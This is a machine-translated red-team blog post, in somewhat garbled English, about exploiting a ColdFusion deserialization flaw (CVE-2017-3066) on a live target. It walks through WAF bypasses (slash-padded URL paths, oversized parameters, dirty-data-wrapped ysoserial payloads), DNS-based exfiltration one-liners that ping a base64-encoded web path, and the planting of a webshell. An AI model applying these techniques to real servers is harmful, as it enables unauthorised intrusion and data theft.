Red team Chapter 10: ColdFusion the difficult process of deserializing WAF to exp to get the target

Part1 Preface

Hello everyone , Last week I shared 《 Give any java Program hang Socks5 Proxy method 》、《 Blind guess the difficult process of using the upload vulnerability of the package 》 Two red team technical articles , The response was not bad . This issue shares a story about Java Deserialization vulnerability waf Case study . The target application system is Adobe ColdFusion dynamic web The server , The corresponding vulnerability number is CVE-2017-3066, I have used this deserialization vulnerability to get permission many times . The target is directly placed on the public network , Website deployed waf, And this waf Can identify deserialization attack packets , I spent twoorthree days , Bypassing layers of protection , After one level after another , Eventual success getshell, The process is very difficult .

Part2 Technology research process

• The first 1 Pit , Around the waf The first level

Waf First of all, url The attack path of is intercepted , Scan the directory to find a /flex2gateway/amf This file path , At a glance, we know that the probability exists coldfusion Deserialization vulnerability , Actually, it is directly placed under the root directory of the website of the external network target . Don't be happy too early , After testing , Just use POST Request access to this /flex2gateway/amf route , Will be waf Intercept . Description in POST Under request ,waf Identify this path , Encounter this path is considered an attack , So stop it . Next, let's look at the bypass method ：

take URL route /flex2gateway/amf Turn into ：

http://www.xxx.com//////////////////////////////////////////flex2gateway///////////////////////////////amf

（////// The string is very long , Much longer than the above , In order to avoid taking up too much space , I won't post it completely ）

The result is still waf Intercepted . Next, continue to add super large strings , Here's how to do it ：

http://www.xxx.com//////////////////////////////////////////flex2gateway///////////////////////////////amf?abc123=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Ok, We managed to bypass waf The equipment is right url Path detection .

• The first 2 Pit , Individual scripts will cause the website to crash

For the exploitation of this vulnerability , It used to be cf_blazeds_des.py This script , But you need to pay special attention when using , This script passes sun.rmi.server.UnicastRef Class to realize the utilization of deserialization vulnerability , The premise is that the server must get the network , I recently 2 Encountered in coldfusion Deserialization vulnerability , Can bounce directly out of the net shell The situation is less and less , And at most dns Can out . Then there is a huge pit , Using this script requires doing your homework in advance , One contract is used successfully , Otherwise send a 3、5 Second packet , The application is bound to hang up . therefore , I hardly use this script , Unless you have to .

• The first 3 Pit ,ColdFusionPwn Tool convergence

Next, we need to find ways to exploit this vulnerability without going out of the network , stay github After various searches , Find out ColdFusionPwn This tool looks good , It's also java Written , If I encounter problems, I can change myself . Who knows when you really use this tool , Has been an error , Prompt unable to load main class . It used to work normally , But I can't use it today , I don't know where the problem is .

From the instructions of the tool ,ColdFusionPwn This tool needs to depend on ysoserial This jar package . I simply downloaded the author's java Code , Use Intellij Idea Import to ysoserial in , Change the code flow a little , Now it can be generated normally by itself payload 了 ,-s And -e yes ColdFusionPwn Two different tools payload Generation patterns , To put it bluntly , That is, different methods of vulnerability utilization , It can be used during actual measurement .

• The first 4 Pit , Around the waf The first 2 Turn off

Use the code from the previous step to generate payload after , take payload Import burpsuite Of Repeater In function , Send the packet out , Results found waf Right again post The inclusion is intercepted , Click on “ send out ” Button ,waf Will directly throw away the data packet , Quickly return to empty .

Next, after a series of tests and judgments , Find out waf The equipment will release oversized packets , As shown in the figure below ,waf The device does not intercept .

But this adds dirty data directly in front of the deserialized byte data , Definitely not , Because the deserialization attack code cannot be triggered . Then I remembered my former colleagues “ Memories float like snow ” Of Java Deserialize articles that add dirty data , So I downloaded his java Code , After a toss , Write the author DirtyDataWrapper Class into its own ysoserial Go inside , Realize to ColdFusionPwn The transformation of mixed dirty data of the generated deserialized packet .

The final generated attack code is shown in the figure below ：

• The first 5 Pit , too waf The first 3 Turn off

Continue to look at the screenshot above , It was found that WAF Intercepted , I don't know where the problem is . Finally, after a lot of testing and analysis , Discover as long as POST The packet contains java.util.LinkedList Class keyword ,waf The packets will be discarded directly .ε=(´ο｀*))) alas , It's so hard . So let's see “ Memories float like snow ” Of java How to write the code , I want to transform it . Finally, I found a simple solution , Put him DirtyDataWrapper Class code type The value is equal to 0, Dirty packets generated in this way , Does not include being waf Intercepted sensitive classes . Specifically, why is it changed like this , There is no narration here , You can start from github Search for relevant codes on , Analyze for yourself .

Finally generated payload, Perfect bypass waf.

• The first 6 Pit ,ysoserial Carry out orders

Next, find a way to get shell、 Take the target , Unfortunately, the server is not offline , There is no direct rebound shell. After testing , Come to the conclusion ：TCP Not out of the network , however DNS Can out . So I thought of a way , adopt DNSlog hold web Read the path bit by bit , If a byte is read too slowly , Can combine linux Read the command paragraph by paragraph , And then to this web Write a... Under the path webshell that will do .

But in the end, a new problem came , In the course of actual combat ,URLDNS This use chain can get out of the network , however ping xxx.dnslog.cn I can't get out of the net anyway ... adopt dns Read the operating system name , It is found that the target server is linux. Finally, I built a local coldfusion Environmental Science , After a series of tests , I find the problem is ysoserial Of Gadgets During the command execution of class .

notes , For this test case , I changed the writing of various executive commands , After a lot of experiments , The code must be written as shown in the following figure , To execute the command successfully . For the first time , Other writing methods are not good , The conclusion of practice is like this , It's so hard .

• The first 7 Pit ,dnslog Length limit

You can go through DNSLOG read web Path , Just get it web route , You can write directly shell Got permission , But it turns out dnslog You can't get the path result anyway . Then I figured it out ,DNSlog There is a length limit , It must be the target server web The path is too long . therefore , I've been tested , combination linux Self contained system directory sed And cut, Give the following method of reading the absolute path of the website paragraph by paragraph . ha-ha , Share it with you .

ping `pwd|base64|sed -n '1p'|cut -c 1-60

ping `pwd|base64|sed -n '1p'|cut -c 61-80

It is best to burp Of Collaborator client function , Very easy to use, very stable , If you use dnslog Words , Many times the browser gets stuck ,dnslog Will never see dnslog Information. , You have to change the domain name , Very trouble . There will be all kinds of inexplicable problems in actual combat , Later I got shell after , It is found that the problem is load balancing ...

• The first 8 Pit , Load balancing

write in webshell after , Find out shell I can't get access to , Has it been deleted ？ Suddenly I slapped my leg , My day, , This station even has load balancing ！ No wonder there are always some inexplicable problems when testing vulnerabilities in the early stage ... So I opened it burpsuite Of intruder function , Will write shell Of payload Hundreds of contracts have been awarded , After the visit webshell The success rate of has been greatly improved ... For load balancing , I have no good solution , add to cookie The method cannot be used .

This case actually encountered more pits than the above , There are many twists and turns , But the time interval is a little long , I can't remember many places , But the key point is the above part , Welcome to make corrections , Send me a message to give advice .

Part3 summary

1. For the exploitation of deserialization vulnerability , Many times you have to exp Make a change , To adapt to various environments .

2. Build more environments , Avoid walking into a dead end .

3. quote “ Memories float like snow ” The article ： https://gv7.me/articles/2021/java-deserialize-data-bypass-waf-by-adding-a-lot-of-dirty-data/